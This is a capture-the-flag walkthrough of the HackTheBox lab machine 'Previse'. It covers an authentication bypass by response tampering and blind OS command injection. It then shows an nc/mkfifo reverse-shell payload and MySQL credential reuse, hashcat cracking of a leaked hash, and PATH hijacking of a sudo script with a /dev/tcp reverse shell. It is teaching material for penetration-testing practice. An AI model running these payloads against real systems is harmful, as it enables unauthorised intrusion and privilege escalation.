Previse HackTheBox WalkThrough

This is Previse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Previse HackTheBox machine. Before starting let us know something about this box. It is a Linux OS box with IP address 10.10.11.104 and difficulty level Easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and confirm your connectivity with Previse machine by pinging its IP 10.10.11.104. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap [a popular Port Scanner] for this task and the result is given below: –

Scanning

$ sudo nmap -sC -sV -sT -p- -oN full-tcp-port.nmap 10.10.11.104

Full port scan with nmap revealed many ports as open. We will focus mainly on ports 22 and 80 as the services running over them are well known. OpenSSH 7.6p1 is running over port 22 and Apache2 web server is running on port 80. Since port 80 is open and web server is running over it so there must be a website hosted over it which can be accessed using the URL http://10.10.11.104. We will begin our enumeration from port 80. Ongoing to the URL http://10.10.11.104 found a login page as shown below.

Simply, tried some default credentials like admin : admin, admin : password, previse : password and some more but none of them worked. Then, tried some login screen bypass SQL payloads it also not worked. Tried fuzzing with some malicious payloads for getting verbose error message but again everything seemed to be configured properly. If I would get some username from anywhere, I would definitely perform bruteforce attack on this login page since it doesn’t have any captcha or rate limit implemented on it. Meanwhile I started my $ dirsearch in background to find folder and file.

$ sudo dirsearch -u http://10.10.11.104/ -e all -x 402,401,403,404 -t 50

Dirsearch found many files and on accessing maximum pages, redirected me to login page. When I tried to access accounts.php page through the URL http://10.10.11.104/accounts.php it redirected me to login.php.

Forced Login into Previse

Then I go to the URL http://10.10.11.104/accounts.php and captured the request in Burpsuite and tried force login by changing the response of the login request. The captured request of accounts.php file is shown in the screenshot below.

Right click on the request and capture the response to this request. Then replace 302 Found to 200 OK to force the application not to redirect on login.php page as shown in the screenshot given below.

After forwarding the request it is observed that we are successfully logged in the application.

Once I logged in the application, I tried to add a new account by registering a new user. I have entered the credential test2 : test2 and after clicking on CREATE USER button again captured the request in Burpsuite and modified the response as we did in above steps.

Now we have successfully registered a user account with the credential test2 : test2.

Let us login into the test2 user account. After login, I saw a file upload functionality then I uploaded a simple txt file and tried to check it whether we can execute it or not. When I accessed it, it immediately started downloading. If any how I would execute it then my next step would be to upload a php web shell and get reverse shell on my netcat listener. But here it is of no use.

There is a backup file present by the name SITEBACKUP.ZIP. After downloading and extracting this file I found credentials root : mySQL_p@ssw0rd!:) in config.php file. Then I tried to SSH into root user but it is not SSH credential. Tried to use this password with other enumerated users like newguy, m4lwhere, admin, etc. but all are useless.

$ cat config.php

After reviewing the source code of all the files inside SITEBACKUP.ZIP found file logs.php which has a php dangerous function exec(). This function is accepting user input through the parameter delim without performing any input validation. Use of exec() function without proper validation may leads to OS Command Injection vulnerability. For more info about exec() check this documentation.

After some testing found Blind OS Command Injection vulnerability inside this file. Since the backup file is downloaded from this website there may be chances that running code on the server may also be vulnerable to OS command injection.

Confirming OS Command Injection

To confirm Blind OS command injection vulnerability, we will inject some time-based OS Command like $ ping command in Previse log.php page and then capture the response of ping using wireshark or $ tcpdump on our Kali machine.

$ sudo tcpdump -i tun0 icmp

We found that we can ping our kali machine through Previse machine. So here we have successfully confirmed Blind OS Command Injection vulnerability using time delays techniques. For more methods for exploiting OS command injection check this article from PortSwigger. Let us get user shell by using some reverse shell one-liner. I am using $ nc command for getting reverse shell. You can use any other also. You can find a list of one-liners here.

Getting User Shell

To get reverse shell start netcat listener on your Kali machine on port 9001 and put the following onliner payload in the delim parameter.

;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.16.10+9001+>/tmp/f

$ nc -nvlp 9001

$ whoami && id

We have successfully got reverse shell with user www-data. Let us upgrade it to fully interactive Linux Shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ ^Z # To background

$ stty raw -echo

$ fg # To put foreground

$ export TERM=xterm

Checking Listening Ports

After some enumeration found that port 3306 is listening locally. Port 3306 is the default port for the classic MySQL protocol (port), which is used by the MySQL client, MySQL Connectors, and utilities such as mysqldump and mysqlpump.

$ ss -lnpt

Since we have already found database credential inside config.php file. So, I tried them to login into MySQL server using $ mysql command.

$ mysql -u 'root' -p

~mySQL_p@ssw0rd!:)

mysql> show databases;

mysql> use previse;

mysql> show tables;

mysql> SELECT * FROM accounts;

mysql> exit

From above we found password hash of user m4lwhere.

m4lwhere : $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Identify the Hash

Before we proceed to crack this hash we need to identify the type of this hash. Let us identify the type of hash and further will crack the hash to get password. The hash appears to be of the form md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) can be confirmed from the below example.

$ hashcat --example-hashes | grep -A2 -i 'MODE: 500'

For cracking the hash, I have used $ hashcat (well-known offline password cracker) with the wordlist rockyou.txt (Rockyou.txt is already present in Kali & Parrot OS inside the directory /usr/share/wordlists/).

Cracking Hash

$ cat hash.txt

$ hashcat -m 500 -a 3 hash.txt /usr/share/wordlists/rockyou.txt

$ hashcat -m 500 -a 3 hash.txt /usr/share/wordlists/rockyou.txt –show

—–SNIP—–

The cracked password for the user m4lwhere is ilovecody112235!.

Let us SSH into m4lwhere account

$ ssh [email protected]

~ilovecody112235!

We are successfully logged in as m4lwhere. Let us capture user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate the privilege to root we have to first find a Privilege Escalation Vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I will go with manual enumeration.

Finding PrivEsc Vector

$ sudo -l command revealed that user m4lwhere can run script access_backup.sh with root privilege.

$ sudo -l

~ilovecody112235!

On analyzing the content of access_backup.sh file found that $ gzip command is not used with absolute path. This introduces here a Path Hijacking Vulnerability. For more info about privilege escalation using path variable check this article.

$ cat /opt/scripts/access_backup.sh

When I tried to escalate the privilege using PATH variable, I could easily perform privilege escalation. So, here our potential PrivEsc vector is Privilege Escalation via Path Hijacking.

Getting Root Shell

To get the root shell I ran the following commands.

On Previse Machine

$ echo $PATH

$ echo '#!/bin/bash' > /tmp/gzip

$ echo 'bash -i >& /dev/tcp/10.10.17.97/9001 0>&1' >> /tmp/gzip

$ cat /tmp/gzip

$ chmod +x /tmp/gzip

$ export PATH=/tmp:$PATH

$ echo $PATH

$ sudo /opt/scripts/access_backup.sh

On Kali Machine

$ nc -nvlp 9001

# whoami && id

We are root now. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

This was how I rooted Previse HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this article. For any query and suggestion about the walkthrough feel free to write us at [email protected].